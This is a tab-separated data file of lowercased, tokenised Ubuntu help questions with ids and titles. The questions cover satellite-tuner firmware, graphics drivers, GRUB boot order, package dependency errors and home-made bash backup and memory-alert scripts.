276147	how do i get mythbuntu to detect my satellite box ?	background : i have a technisat skystar usb hd dvb-s2 digital satellite usb box , a fresh install of mythbuntu 12.04 , and i would like myth to use the satellite box . my immediate problem is that the kernel does n't appear to be detecting the satellite box . i installed kaffeine : it does n't show any tv devices . the kaffeine faq states that if my device is recognised , there should be dvb messages in dmesg ; dmesg | grep -i dvb does n't match anything . the technisat skystar usb hd is listed as supported since linux 2.6.39 on the linux tv wiki . uname -a says i am running linux 3.5.0-23-generic . i do n't believe it is a hardware problem , because we got the satellite box working with a windows 7 pc . i have double-checked that everything is plugged in properly . how do i get linux to detect the satellite box ? edit ( in response to david6 's questions ) : the final line of output from lsusb is bus 002 device 004 : id 14f7:0500 technisat digital gmbh dvb-pc tv star hd lsmod | grep -i dvb and dmesg | grep -i dvb both give no output . edit following the instructions in david6 's answer , and after rebooting : the output of lsmod | grep -i dvb is now dvb_usb_technisat_usb2 17976 0 stv090x 62331 1 dvb_usb_technisat_usb2 dvb_usb 32408 1 dvb_usb_technisat_usb2 dvb_core 105916 2 dvb_usb_technisat_usb2 , dvb_usb rc_core 22172 13 dvb_usb_technisat_usb2 , dvb_usb , ir_lirc_codec , ir_mce_kbd_decoder , ir_sanyo_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc5_decoder , ir_rc6_decoder , ir_nec_decoder , rc_rc6_mce , mceusb the output of dmesg | grep -i dvb is now [ 2.401826 ] 79a63c60a6a2ae589e44529401e0ab1150e9408a [ media ] media : move dvb-usb-v2/cypress_firmware.c to media/common [ 2.732886 ] 79a63c60a6a2ae589e44529401e0ab1150e9408a [ media ] media : move dvb-usb-v2/cypress_firmware.c to media/common [ 3.233497 ] dvb-usb : found a 'technisat skystar usb hd ( dvb-s/s2 ) ' in cold state , will try to load a firmware [ 3.234838 ] dvb-usb : did not find the firmware file . ( dvb-usb-skystar_usb_hd_fw_v17_63.hex.fw ) please see linux/documentation/dvb/ for more details on firmware-problems . ( -2 ) [ 3.234866 ] usbcore : registered new interface driver dvb_usb_technisat_usb2 i still can not use the satellite box . i can not find the linux/documentation/dvb/ directory referred to in the dmesg output . it is not in the media_build repository , and it is not in any ubuntu package . where do i go from here ? on the assumption that the linux/documentation/dvb/ directory is helpful , where is it ?
276152	blurry images with mogrify & convert	does anyone know why this image is so blurry ? i did a convert from pdf to png and it turned out like that . before deleting imagemagick and it 's entire toolset from software-center most of my image programs were displaying like this image . now for the most part it 's just blurry , though a couple still display like that such as gimp . i am running in xfce maybe it 's to do with the distribution enviornment . main issue is the absurd blurriness . i reinstalled all additional packages that were available for imagemagick in the software-center i use convert *.pdf *.png & mogrify -format png *.pdf to convert now on the other hand if i converted the file to djvu and converted that to a tif . the images have no problem converting . more so it does not generate an oversized tif file of around 25mb compared to 3mb with djvu which is super clear & no blurriness .
276160	google+ hangout application not getting installed	the other day i was trying to have a online hangout and logged into google+ and when i clicked on start a hangout it prompted me to select if my os was 32 bit or 64 bit to download a plugin for ubuntu . i clicked on 64 bit ( i found out that my kernel is 64 bit by using the code uname -m in the terminal and the output was x86_64 ) . the download was done and i was redirected to the software center application where i had to install a google-plugin . when i clicked on it an error pops up saying installation or deletion of software failed . do we need to install the plugin also for the hangout ?
276163	how to start gummi ( gtk+ based application ) maximized ?	is there something i could add to the exec line ăźn gummi.desktop which would do the trick ? [ desktop entry ] version=1.0 name=gummi genericname=latex editor comment=simple latex editor exec=gummi % f icon=gummi terminal=false type=application categories=office ; startupnotify=true mimetype=text/x-tex ; https : //apps.ubuntu.com/cat/applications/precise/gummi/ http : //dev.midnightcoding.org/projects/gummi https : //launchpad.net/~gummi/+archive/gummi
276165	can not install phpmyadmin and mysql	after an interrupted upgrade of ubuntu 10.04 server lts to ubuntu 12.04 server lts somethings were n't installed correctly . anyways i installed apache , ftp , phpmyadmin etc . at some point i deleted some packages that were causing problems and that messed up my mysql and phpmyadmin installation . now i can not install mysql and phpmyadmmin . i get the following error trying to install mysql : the following packages have unmet dependencies : mysql-server-5.1 : depends : mysql-client-5.1 ( > = 5.1.67-0ubuntu0.10.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . and i get the following error trying to install phpmyadmin : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libxml-libxml-perl : depends : perl ( > = 5.14.2-6ubuntu1 ) but it is not going to be installed depends : libxml-namespacesupport-perl but it is not going to be installed libxml-sax-expat-perl : depends : perl but it is not going to be installed depends : libxml-namespacesupport-perl ( > = 0.03 ) but it is not going to be installed depends : libxml-parser-perl ( > = 2.27 ) but it is not going to be installed libxml-sax-perl : depends : perl but it is not going to be installed depends : libxml-namespacesupport-perl but it is not going to be installed depends : libxml-sax-base-perl but it is not installable phpmyadmin : depends : perl but it is not going to be installed recommends : apache2 or lighttpd but it is not going to be installed or httpd recommends : mysql-client e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
276166	just installed couchdb , permission error	just installed couchdb 1.2.0 via apt-get . i want access to the error logs in /var/log/couchdb however i ca n't open the folder , recieving the error message : the folder contents could not be displayed . you do not have the permissions necessary to view the contents of `` couchdb '' . owner is listed in the folder properties as : `` couchdb - couchdb administrator '' . what do i need to do to get access ?
276167	how to install mac buttons and scrollbars on 12.10 ?	i recently installed the mac theme for ubuntu 12.10 from noobslab . the installation went properly and i am now running the mac theme . but i still do n't have the scrollbars and buttons for mac . this is how i would want my complete mac theme to look like . https : //fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-snc6/8396_503280466376344_761018214_n.jpg is it possible ? if so how ?
276169	how to add a drop shadow effect in gimp ?	can anyone tell me how to add a drop shadow effect in gimp . i have seen it in a number of designs . examples : and
276170	speakers and headphones at the same time when using a dv6-2170	i am on a hp pavilion dv6-2170us , running 32-bit ubuntu 12.10 . when i plug in my headphones the speakers and the headphones play sound at the same time . the speakers should stop playing and send all sound to the headphones . how can i configure the sound that when i connect my headphones the speakers in the laptop are muted and the sound only comes out to the headphones . i should mention that this model provides 2 audio output connections in the front ( not just one like most laptops ) . here is an image of how the sound settings looks : thanks !
276171	static ip no internet	so i followed these steps to get static ip and lost connection sudo -s nano /etc/network/interfaces changed auto lo iface lo inet loopback to same as above with auto eth-d iface eth0 inet static address etc then reset networking
276172	no effective root	i wanted to login as a user , but when i typed in login usr ( usr is just a placeholder for the user name ) the system returned : login : can not possibly work without effective root . how can i fix this ?
276174	how can i find out how nginx was `` ./configure '' d for ubuntu ?	nginx is my web server of choice . it does n't provide loadable module support as of yest , therefore everything has to be compiled and linked into the final binary . how can i find out which configuration - particularly for the additional modules , the package maintainer chose ?
276175	lubuntu desktop ui alternative	having gotten sick of windows 7 starter edition for being so ridiculously slow on my netbook , not long after i bought it i installed lubuntu so that i could actually get things done without having to wait an age for stuff to load ( and that was after an upgrade to 2gb of ram ) . so , since then i have kept windows 7 on my netbook for the sake of being able to do stuff i only knew how to in windows , and because i was not entirely used to/comfortable with linux yet . now , however , i have decided to make lubuntu my permanent os on this machine , my only gripe being that the default desktop environment is n't exactly the most pleasant to look at ... i understand that this is partly because of the fact that it is so lightweight , and my netbook might struggle with some of the effects in full desktop oses ... however , there must be some still relatively lightweight alternatives which look nicer . i 'm jealous of how beautiful an interface ubuntu 's unity is , but i would n't dare try and run it on this little thing .
276180	replacing windows 7 with ubuntu on a lenovo t530	i am purchasing a lenovo t530.i want to replace windows with ubuntu 13.04.i contacted lenovo customer support and asked if they offered one with out an operating system.i was told no and there was no way of removing windows.is this true ? is there a way ? or am i forced to dual boot until my t530 is out of warranty ? i know there are great makers out there that build machines to run ubuntu.but.i have thinkpads dating back to 1999 and all run ubuntu flawlessly.i want to keep with tradition.i have been a loyal ubuntuer since lucid.and have never turned back . i simply detest windows , so any help would be greatly appreciated.thank you ! and thank you for the great o.s . vince .
276181	will the alpha/beta iso become official after release ?	i am moving to use a alpha/beta iso and i am wondering will it become stable after official release or will i need a new iso ?
276191	software updater wo n't update , says to check internet . ubuntu 12.10	i have been getting this error for the last couple of days since i have done a fresh install of ubuntu 12.10 on my amd64 hp pavilion m6 laptop . it says to check internet but my internet connection is working fine . i can download from the software center . this is what it says :
276199	accept ssl cert for wrong domain	a site has recycled their ssl cert from another site which is causing me errors on the command line ( wget , etc ) . they have 2 certs on different parts of the site both issued by the same authority which i have added the root and intermediate crt 's for . what additional steps may i take to allow my system ( 12.04 ) to accept this 2nd cert with the wrong domain ? clarification : these are two different domains and tld 's , not a sub-domain mismatch .
276220	lyxpipe missing in ubuntu 12.10	i decided to write my thesis in lyx , got everything working nearly perfectly , but i found a strange problem which google cant help with ... i tried to import citation from jabref to lyx , got only error `` verify that lyx is running and the lyxpipe is valid '' lyx running is , but when i tried to solve lyxpipe problem , i found out that i dont have lyxpipe ( lyx and jabref were installed via ubuntu software center and after some searching , i found out that lyxpipe should be there , i tried to remove and reinstall lyx via software center , but still nothing ) , dont anyone knows whats wrong with my lyx ?
276224	git push not working in ubuntu	i do n't know what i 'm doing wrong but i can not make git push work in ubuntu ( 12.10 ) . i already tried from command line , netbeans ide and rabbitvcs . this is a list with the errors i get : netbeans : can not connect to the remote repository at https : //myname @ bitbucket.org/myname/prepo.git rabbitvcs : failed to connect to bitbucket.org:8080 ; connection timed out while accessing https : //myname @ bitbucket.org/myname/prepo.git terminal : nothing is displayed , just a long wait . since my repository is on bitbucket and it 's private , i made a public repository just to see if there are no credential problems but this does n't work either . can you give me some tips for troubleshooting ? what files/configs should i verify or update ? thanks in advance
276230	only loopback in /etc/network/interfaces - but internet works ?	i just looked in /etc/network/interfaces , for the sake of learning ubuntu better than before . what i 'm wondering is . why does it look like this : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback why is my eth0 , and wlan0 not in there ?
276234	need application/script alerting when system memory is running out	i do n't wo n't to use swap file ( due to some bug in kernel or amd driver ) . i wa n't to have some util running and monitoring free system memory and alerting me when it becomes less than some specified limit . this will notify me that i need to close some applications ( or browser tabs ) to avoid system freeze due to some strange kswapd0 i/o activity ( probably another bug ) . is there any appropriate software ? update : i 've redesigned script provided by gary for my need and want to share it # ! /bin/bash # minimum available memory limit , mb threshold=400 # check time interval , sec interval=30 while : do free= $ ( free -m|awk '/^mem : / { print $ 4 } ' ) buffers= $ ( free -m|awk '/^mem : / { print $ 6 } ' ) cached= $ ( free -m|awk '/^mem : / { print $ 7 } ' ) available= $ ( free -m | awk '/^-\/+/ { print $ 4 } ' ) message= '' free $ free '' '' mb '' '' , buffers $ buffers '' '' mb '' '' , cached $ cached '' '' mb '' '' , available $ available '' '' mb '' '' '' if [ $ available -lt $ threshold ] then notify-send `` memory is running out ! '' `` $ message '' fi echo $ message sleep $ interval done
276235	how to switch launcher to another monitor after installing amd/ati drivers ?	i 've had a ton of issues after installing the amd/ati drivers on 12.10 . i had to follow some workarounds to even get my system to boot . now that i 've got drivers installed and my dual monitors set up , ubuntu puts the launcher on the secondary monitor . when i try to switch it in settings - > displays , i get a couple of error screens . i got the first message when i tried to configure my monitors through displays , but realized i 'm supposed to do that through the catalyst control center . unfortunately , there 's no option in ccc to switch launcher position . the launcher moves over after the errors but reverts back after a restart .
276239	brightness shortcut does n't work right on an acer aspire 5750g	i have an acer aspire 5750g with ubuntu 12.10 . i have a problem with the brightness shortcut . if i press fn+right arrowand fn+left arrow , the brightness actually changes but not in the right way . on the other hand , when i type in the terminal gnome-control-center screen , i can adjust the brightness in the proper way . is it possible to adjust the brightness of the laptop in the right way using the shortcut ? remark : i found a lot of questions on askubuntu regarding brightness issues but here the problem is different ; both `` brightness and lock '' and shortcuts work right now , but shortcuts do not work in the right way !
276240	how to access an application from the system menu	i just setup phpstorm on ubuntu and it says it can be accessed via the `` system menu '' but i ca n't figure out where that is in ubuntu 12.10 . i used gnome-desktop-item-edit to create a launcher icon . what is this system menu that is referenced and where can i find it ?
276242	does ubuntu detect and recognize windows phones ?	i recently bought a nokia lumia with windows phone 8 os on it ; and now i 'm planning to install ubuntu on my laptop . my concern is , does ubuntu detect or recognize windows phone ?
276244	/usr/bin/ld : can not find -lgsl on ubuntu 10.04	i was given a program to install and after running the makefile , i got the error gcc -o sd_plot sd_plot.o -lgsl -lgslcblas -lm /usr/bin/ld : can not find -lgsl i already installed the gnu scientific library , and made sure it was installed by checking with the package manager , but i am still getting this error . since i was given the program , i am sure the makefile is correct , so there must be something wrong on my machine . suggestions ?
276246	ca n't mount a ssd	i have a bit of a problem . i am running ubuntu 10.04 lts on my laptop , and about 2 years ago i replaced the aging hdd with a 32 gb ssd . today i tried to boot my computer , but it could n't . so i 've put the ssd into an external hdd rack and booted a live cd ubuntu 10.10 to try to recover data from the ssd . the ssd appears in the drop down menu but it wo n't mount . ubuntu @ ubuntu : ~ $ dmesg | tail [ 2125.445659 ] sd 8:0:0:0 : [ sda ] 62533296 512-byte logical blocks : ( 32.0 gb/29.8 gib ) [ 2125.446983 ] sd 8:0:0:0 : [ sda ] write protect is off [ 2125.446988 ] sd 8:0:0:0 : [ sda ] mode sense : 17 00 00 08 [ 2125.446992 ] sd 8:0:0:0 : [ sda ] assuming drive cache : write through [ 2125.449084 ] sd 8:0:0:0 : [ sda ] assuming drive cache : write through [ 2125.449098 ] sda : sda1 sda2 < sda5 > [ 2125.454285 ] sd 8:0:0:0 : [ sda ] assuming drive cache : write through [ 2125.454293 ] sd 8:0:0:0 : [ sda ] attached scsi disk [ 2125.777836 ] jbd : no valid journal superblock found [ 2125.777840 ] ext4-fs ( sda1 ) : error loading journal is there a way to solve this issue so i can recover the data ?
276247	what will happen if ram set to 1000 from 1024 ?	while i am looking at man page of free i came across -- si use power of 1000 not 1024 . so from that line we can say that from 1gb ( 1024mb ) of ram it will use only 1000mb of ram . but why are we supposed to do like that ? where we can use this ? if we do so what will happen to remaining 24 mb . what exactly it supposed to be ? thank you .
276249	changing grub boot order	so i am triple booting win 7 ( yeah i know ) ubuntu and bt5 on my dell latitude e4300 . it is on a single harddisc with a partition for each of the os' as usual it is the last installed to be the first on the list and booting into if no other choice is made in the time slot before boot . that means in my case that bt5 boots auto , and i need it like 4 or 5 times a month . now , i have tried with a grub editor for ubuntu , i can re arrange the partitions , but when i save and restart , it is the same configuration as i am trying to alter . in windows . well . windows `` advanced '' settings , only lets me see that i have several partitions , but only one os . windows 7.. i would love if someone could help me with maybe even a gui way to rearrange the boot order of my gnu grub ? if no gui , terminal will do ..
276251	deleted windows boot partition by mistake	i have windows 7 installed on my laptop . today , while trying to manually partition the drive for linux install , i accidentally formatted the 100 mb system reserved partition to ext4 . then , i ignored the problem and went on with installing linux on my intended partitions . by the way , i used to use the windows boot loader to dual boot ( edited with easybcd ) .is it possible to fix this problem using the windows 7 setup cd and then configure the dual boot using easybcd like i used to do ?
276253	graphics drivers `` break '' right after installation and updating	this happens every time i install ubuntu . i 'll pop the live cd in , and install it . the graphics work fine until i have to install mandatory updates and then restart . from there , i 'll be unable to even log in , as the login screen is a glitchy mess , save for a row of pixels at the top of the screen that are actually clear . the only way i can circumvent this is by installing a bunch of pre-release updates and switching to a proprietary driver ... however steam games , many gui elements , and screenshots wo n't work , or they 'll be immensely laggy and glitchy . what can i do to ensure optimal performance and stability for an ati radeon hd 6850 ( 1gb ) graphics card ?
276257	mythbuntu restore : how to find out database password ?	i recently decided to reinstall my mythbuntu system , as it had been upgraded in phases from version 10.x and was throwing up fairly frequent errors . the situation as was : mythbuntu 12.something , running mythtv 0.26 . recordings are stored on a different drive to everything else , including the database . how i proceeded : used the mythbuntu control centre 's builtin backup command to back up settings and database to the recordings drive . reinstalled mythbuntu from an up to date iso , wiping the system drive in the process . updated to mythtv 0.26 using the mythbuntu repo . edited fstab to mount the recordings drive in the appropriate place . used the mythbuntu control centre 's builtin restore command to restore the database and settings . the problem : now mythfrontend insists that it ca n't find the database . my guess is that one of the things that was backed up and restored was the mysql password for the database - but presumably on a new install this is different to the old install ? how can i find out the correct password ? or , am i barking totally up the wrong tree here ? thanks : ) i 'm afraid my knowledge of mysql admin is rather limited .
276260	cryptkeeper 0.9.5 - 5.1 on ubuntu 12.10	just fyi - i used cryptkeeper to encrypt a folder containing over 2 gigabytes of files ( that 's alot of files ) , and it seemed to work ok , it took a little while to encrypt all those files . but , when i decrypted the folder , it only took a few seconds to decrypt all the files . say what ? ! does anyone have any idea what happened - it does n't make any sense to me . it 's as if the original unencrypted files were saved somewhere and then when i decrypted the folder , cryptkeeper did n't actually decrypt the folder but instead just made those original files reappear .
276263	flash player issues	flash videos do n't work online ( namely youtube , et al ) . i had tried reinstalling the flash player add-on and doing a system update but no improvement . the problem started just after installing ubuntu 12.04 i386 . my browser is mozilla firefox , but the same issue exists in chromium .
276268	wi-fi does n't work on packard bell easynote a6	i installed ubuntu 12.04 32-bit on a packard bell easynote a6 . ubuntu in general works well , with the exception of the wi-fi . i have looked around on the internet a bit and i think that the problem has to do with the drivers for the wireless card , a realtek rtl8139 . i tried to use a tool that ( supposedly ) allows me to use windows drivers on linux , but it did not work . how can i fix my problem ?
276271	problems upgrading to a new version of ubuntu	when upgrading to a new version of ubuntu i am asked to type login/password - which i do n't know/remember . how to reset this ? or to upgrade without using password .
276277	shotwell : storing part of library on external hdd	i am trying to sort out my ubuntu photo workflow , and i wondered if anyone could offer some advice . i store my photo library on an external hdd , which is on my desk at home . i would like to be able to import and process my photos on my local hdd , and then move them over to the external hdd when i get home . i would also like to be able to access a small thumbnail when not connected to the external hdd . this seems like a problem which must be fairly common , but i 've got no idea how to deal with it . any ideas ?
276279	why does my application behave differently with unity ?	i 'm the newly appointed application maintainer for a program called `` xlog '' . the program works fine in all but the unity environment . it is written using gtk2 . i 've never previously used unity . i noticed in unity that the menu bar seems to be `` redirected '' to another place outside of my application gui , to a bar at the top of the screen . secondly , one of the text entry boxes in my gui is displayed as a thin line , unaccessible to the user except via the tab key . if i take the xlog executable that works perfectly under ubuntu 12.04.2 lts and copy it to a 12.10 unity distribution , i see the different behavior . i have n't a clue where to look , or what i should consider modifying , in the xlog application , to remedy this situation . what 's different in unity that is unique to all other environments where this application works properly ?
276281	how do i configure matplotlib to work on ec2 ?	we are trying to set up a virtual development / research cloud environment for our students . students need to be able to log-in , launch python ide , and plot some graphs for their homework . we are running 64bit ubuntu 12.10 , with python and idle ide installed . students login with using ssh -x and launch idle , which spawns a gui window . problem : running something like this in the ide nltk.download ( ) spawns a new window . but when we try something like this : book2.dispersion_plot ( `` chair '' ) nothing happens , where we would expect a new window to spawn and show the plot ( thats what happens on the local machine ) . i suspect this has something to do with x11 but at this point i am way out of my depth of sys admin knowledge . confirmed this both from a mac ( xquartz ) and pc ( xming ) client . any help would be much appreciated .
276284	postgresql postmaster not starting	i 'm trying to install a postgresql instance after building it from source , but running the postmaster daemon prior to starting up the database cluster does n't seem to work . here 's the error message i got when i started it up : postgres @ home : ~ $ /usr/local/pgsql/bin/postmaster -d /usr/local/pgsql/data log : could not bind ipv4 socket : address already in use hint : is another postmaster already running on port 5432 ? if not , wait a few seconds and retry . warning : could not create listen socket for `` localhost '' fatal : could not create any tcp/ip sockets after googling around , the only result i could find which gave me some hints told me to run the following commands , the output of which follows : postgres @ home : ~ $ lsof -i :5432 command pid user fd type device size/off node name postgres 1169 postgres 3u ipv4 1998 0t0 tcp localhost : postgresql ( listen ) postgres @ home : ~ $ netstat -an|grep :5432 tcp 0 0 127.0.0.1:5432 0.0.0.0 : * listen which leads me to believe that the connection that the port that the postmaster daemon is trying to latch onto is , in fact , available . any ideas on what might be causing it ? and if you 're curious , i 'm running pgsql 9.2.3 . ( also , please move this to stack overflow or programmers if this is the wrong stack exchange site to ask this at . )
276288	recent qt repository	is there any repository for latest qt versions ( recent version is 5.0.1 while ubuntu has 4.8 ) ? ps i found this ppa but it tagged as [ deprecated ] ! ! ! , so i 'm wondering what if there is official one by canonical .
276290	how to access the internet from a virtual machine in gnome boxes ?	i installed gnome boxes , created a new virtual machine and booted an iso . the iso boots up fine and the network inside the virtual machine got automatically configured by the distro ( with dhcpd ) : ip enp0s3 got the ip 10.0.2.15 dns nameserver : 10.0.2.3 gateway default : 10.0.2.2 both other hosts are up and i can ping all ips . dns works too . but i ca n't ping anything not on the local net .
276293	how to change graphics options for intel chipsets ?	i have acer aspire 5349 with some integrated intel gpu . on windows i could just open an intel program in which i could change my graphical settings like colors , but also 3d settings for improving performance/quality . i 'm talking about this http : //www.intel.com/support/graphics/sb/img/cs030506_image2_large.jpg and i desperately need it here on ubuntu , to which i moved yesterday , because i am experiencing some graphical bugs at css on steam . if there is no such program/equivalent then i would be okay with some console commands but please be brief- i am quite new to ubuntu , so i 'm happy for just remembering the ctrl+alt+t shortcut !
276294	ati drivers `` break '' in between installing/updating ubuntu for the first time . what can i do ?	this might sound odd , but i have a very peculiar graphics driver issue . basically , i pop the live cd in , and `` try ubuntu '' . everything works fine from gui animation , to fullscreen flash , to even full-screen 3d graphics . however , when i install the os itself , and reboot into it `` properly '' for the first time , everything breaks . if i stick with open source , i 'm unable to use the computer at all , and if i switch to any of the proprietary ati drivers , usually the os will be laggy , full-screen flash videos will be black , or 3d graphics will be choppy and glitchy . it seems as if somewhere in between testing the os out , and installing/updating it `` breaks '' the drivers . what can i do to keep them ? i have an ati radeon hd 6850 ( 1gb ) graphics card , and i 'm running a 64-bit os .
276298	xinetd on kubuntu 12.04	does xinetd comes pre-installed with kubuntu 12.04 ? if so , where is the xinet.d directory ? and if not - how do the network processes , that should be awaken by xinetd , work without it ?
276302	problem running league of legends	i 'm running ubuntu 12.04 and recently installed league of legends . i successfully installed it , but when i started one of the matches , i could n't see my character or the surrounding terrain . i could see my hud , so that leads me to believe there is a missing software package . i installed it using playonlinux . any ideas on what to do here ?
276303	does 7zip work with archive manager ?	yesterday i installed 7zip on ubuntu 12.04 lts and i was able to extract a .rar file by using the archive manager . right click - > extract here today i decided to reinstall ubuntu 12.04 lts . then i installed 7zip from the ubuntu software center and i tried to extract a .rar file the same way as last time and i see the following : '' could not open this file type . there is no command installed for rar archive files . do you want to search for a command to open this file ? '' i know that you can install unrar if you want to extract .rar files using the archive manager but i want to know why 7zip worked the last time and now after a fresh install it does n't .
276304	how do i get a rosewill usb wireless adapter rnx-n180ube working ?	need a how to install for rosewill usb wireless adapter rnx-n180ube . dell laptop using ubuntu 12.04 . rosewill usb wireless adapter rnx-n180ube . lsusb shows as : obda:8172 and realtek corp rtl8191su lsmod shows : r8172u could someone step me thru the install ? any more info i 'll provide .
276312	memtest86+ fails to launch	installed on ubuntu 12.04 , so version is 4.20-1.1ubuntu1 as per repository . selecting memtest86+ from the grub menu gives a black screen for a bit , and then the laptop reboots , failing to show memtest86+ blue screen . what could be the cause of this and how can i run memtest86+ ?
276314	startup application entries can not be added	i want a few apps like synapse , goldendict , etc to start up on boot , so i tried using the startup manager and using the command of the apps found in usr/share/applications , then right clicking > properties . reboot , none of the added apps were started , i checked the startup manager , and the entries i added were n't there anymore ( only dropbox , which was added when i installed dropbox ) . i tried running the startup manager using root in terminal , the startup manager was empty ( no dropbox ) . i reboot , and none of the apps i added started ( dropbox did ) . i run the startup manager as root again , the entries i added earlier were there still . it seems like running the startup manager as root or none root returned two `` separate '' startup managers since one had the one and only dropbox , and the other was presented with all the apps i added myself . any help would be very appreciated ! thanks !
276316	ca n't type in password for steam install on ubantu	i just got steam from the ubuntu software center , and it asked me to reopen steam to finish the installation . when i opened it up , i got a terminal that said the following : steam needs to install these additional packages : libgl1-mesa-dri : i386 , libgl1-mesa-glx : i386 , libc6 : i386 [ sudo ] password for michael : when i go to type in my password in the terminal , it is n't registering that i am typing my password in and it is staying blank . i tried a fresh terminal window to see if i could type in that one and i could , and everywhere else i can type except for the steam install terminal which is called `` package install '' . i have tried to reset my machine a couple of times to see if that would fix the problem and it did n't . does anyone know what the problem might be ? thank you for taking the time to read all of this .
276318	how to keep the xorg settings from the live cd/usb ?	for some reason no matter what i do in regards to getting proper ati drivers , nothing works . however , testing out the os in a live usb is actually perfect . full-screen flash works , 3d graphics work , and everything is snappy . is there a way i can install ubuntu without the `` default '' graphics drivers changing ? like i said , everything is fine and dandy until i actually install the os and reboot . then i 'm greeted to a glitchy , useless mess , which prompts me to switch to a slower , laggier proprietary driver . i have an ati radeon hd 6850 graphics card , and i 'm on ubuntu 12.04 ( x64 )
276321	getting ubuntu to recognize a bcm43231 network card what is up with terminal	i 'm trying to see if i can make ubuntu recognize my wireless adapter which is a netgear wna3100 that uses broadcom bcm43231 . this file lists those modules which we do n't want to be loaded by # alias expansion , usually so some other driver will be loaded for the # device instead . # evbug is a debug tool that should be loaded explicitly blacklist evbug # these drivers are very simple , the hid drivers are usually preferred blacklist usbmouse blacklist usbkbd # replaced by e100 blacklist eepro100 # replaced by tulip blacklist de4x5 # causes no end of confusion by creating unexpected network interfaces blacklist eth1394 # snd_intel8x0m can interfere with snd_intel8x0 , does n't seem to support much # hardware on its own ( ubuntu bug # 2011 , # 6810 ) blacklist snd_intel8x0m # conflicts with dvb driver ( which is better for handling this device ) blacklist snd_aw2 # causes failure to suspend on hp compaq nc6000 ( ubuntu : # 10306 ) blacklist i2c_i801 # replaced by p54pci blacklist prism54 # replaced by b43 and ssb . blacklist bcm43xx # most apps now use garmin usb driver directly ( ubuntu : # 114565 ) blacklist garmin_gps # replaced by asus-laptop ( ubuntu : # 184721 ) blacklist asus_acpi # low-quality , just noise when being used for sound playback , causes # hangs at desktop session start ( ubuntu : # 246969 ) blacklist snd_pcsp # ugly and loud noise , getting on everyone 's nerves ; this should be done by a # nice pulseaudio bing ( ubuntu : # 77010 ) blacklist pcspkr # edac driver for amd76x clashes with the agp driver preventing the aperture # from being initialised ( ubuntu : # 297750 ) . blacklist so that the driver # continues to build and is installable for the few cases where its # really needed . blacklist amd76x_edac and when i put in the same command that gave the user from how to install broadcom / sta wireless card ( bcm43xx ) it does absolutely nothing and is not entirely a duplicate question . as i have mentioned i have looked around and tried solutions that others have found to work
276331	help debugging backup script	every 3 hours the script will run and backup a folder `` source '' and it will save it along with the other backups of the current day in the folder `` month-day-year '' e.g . `` 03-24-13 '' . when a new day comes , it creates a new folder with the new date and deletes all but the latest backup in the previous day 's folder . here is where the problem is , will not delete the old folders from the previous day . any ideas why ? # ! /bin/sh dir=/media/hdd source=/home/eric/creative/ date= $ ( date + '' % m- % d- % y '' ) yesterday= $ ( date -d '1 day ago ' + '' % m- % d- % y '' ) time= $ ( date + '' % t '' ) destination= $ dir/ $ date/ $ time space= $ ( df -p $ dir | tail -1 | awk ' { print $ 4 } ' ) needed= $ ( du -s $ source | awk ' { print $ 1 } ' ) folders= $ ( find $ dir/* -maxdepth 0 -type d | wc -l ) # if there is not enough space , delete the oldest folder if [ $ needed -ge $ space ] ; then ls -dt $ dir/* | tail -n + $ folders | xargs rm -rf fi # if there is not a folder for today , create one if [ ! -d `` $ dir/ $ date '' ] ; then mkdir $ dir/ $ date # if there is a folder from yesterday , keep only one of its backups if [ ! -d `` $ dir/ $ yesterday '' ] ; then ls -dt $ dir/ $ yesterday/* | tail -n +2 | xargs rm -rf fi fi # create the new backup directory if [ ! -d `` $ destination '' ] ; then mkdir $ destination fi # backup source to destination rsync -a $ source $ destination
276332	dual boot two hard drives	i have two separate ssd drives on my computer . i would like to be able to have an option of dual boot in the grub menu at start up . at present ubunf8tu is the boot . my option to boot into openelect is two restart , and quickly select ctrl + f8 combination at start up . this allows me to select the drive from the bios menu at start up . is this possible , how ? any help is valued . /dev/sda1 ubuntu 12.04 lts /dev/sdb1 openelect
276334	lubuntu not shutting down , but restarting	i have lubuntu 12.10 on an ibm netvista . for some odd reason , whenever i click `` shut down '' from the logout menu in the taskbar , it goes to the `` boot : ibm : press f12 to change boot settings '' screen with the ibm logo , then it goes to lubuntu again and it logs me back in . any way to get it to shut down right ? ' thanks everyone .
276335	where can i download ubuntu 13.04 beta release ?	i 've heard that the ubuntu 13.04 beta release is out . if that 's correct , where can i download it ? when i look for it , all i find is the daily build , which is different from the beta release , right ? thanks !
276342	after installing ubuntu restricted extras : problem with sound	after installing 'ubuntu-restricted-extras ' i 've been having trouble with my audio : i can hear music from my headphones , but not from my built in audio and when skyping the sound randomly breaks off . does one thing have anything to do with the other ?
276346	lxterminal and xterm resize command	i want to execute a command in a bash script that will resize the terminal window . in xterm xterm -geometry=30x30 will create a new xterm window , and lxterminal -- geometry=30x30 will create a new lxterminal window . is there a way to resize either terminal without opening a new window ? this is what it would look like : if [ $ terminaltype=xterm ] ; then dash= '' - '' else dash= '' -- '' endif echo -e $ terminaltype '' `` $ dash '' geometry 30x30 '' but : if there is a command that is a nice one-liner that will work with either terminal ( vt100 escape sequence maybe ) then that is even better .
276347	need split screens in ubuntu 12.10	i am not a techie but using ubuntu for the last 3 years now i have a question to ask ... i am translating a book so i need two screens opening at the same time one opening into the pdf file from the pc other opening into the web for researching side by side i went thru the web but could not find an answer help me my ubuntu version is 12.10
276348	bottom half of screen is glitchy	total newbie here ... i 'm running 12.04 on a salvaged hp pavilion zt1130 . video is s3 savage4 agp 4x ... no idea if it 's a card or what . i 'm unable to find anything about a driver . i 'm having a half-screen problem similar to the issues with gma500 ... bottom half of the gui is buggy and i ca n't move the pointer into that area , nor is the pointer visible in the upper half . suggestions ? i 've tried the solutions mentioned here in hopes that it might be a similar issue , but no luck .
276349	can ubuntu be installed to a portable hard drive ?	here is my question- can i install ubuntu of a partition of a portable hard drive ? hard drive in question is this one . i want to give it half the total size available and also want to know if the os will be portable and hence if i can run it on different systems .
276352	how to stop adding unused module to loadable kernel module ?	is there any way how to stop unused module to loadable kernel module other than putting them in the mod probe blacklist .
